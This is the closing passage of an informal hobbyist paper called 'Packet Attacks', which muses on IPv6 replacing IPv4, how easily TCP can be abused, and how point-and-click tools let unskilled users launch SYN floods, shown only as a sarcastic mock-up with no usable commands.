data. If an attacker were to breach the security of these 'data' centers, the
damages would be catastrophic. It is certain by this point that IPv6 will
co-exist with IPv4 for a time. IPv6 will allow many more hosts to join the
internet, and hopefully a great deal of new secure protocols for us to use
and study.
Let's take for example the TCP protocol. It's imperative for the internet to
transfer data, yet it's so easily manipulated. Now the average end user
usually does not have the knowledge to manipulate it and cause damage. This
is what has kept the internet so stable (I believe) over the past 30 years of
its brief history. However these days we see more and more crackers releasing
programs that craft these attacks so easily for the average end user.
Insert Victim, Click Here
... sending 21487298174157815 SYN packets
to the victim...
Wow, that took an enormous amount of skill? ...Right. So you can see how easy
it is for script kiddies to launch these attacks with the current set of
tools manipulating IPv4 protocols.
I would like to suggest a link on IPv6, http://www.ipv6.org/specs.html; it
is full of information on the changes in IPv6.
Well that's it for my paper 'Packet Attacks'. Whether you're getting ready to
email me with a flame or a question, I sincerely hope you enjoyed this paper,
as I have enjoyed writing it. Look forward to many more projects and papers
by me. Thanks again for reading.
Dreifachx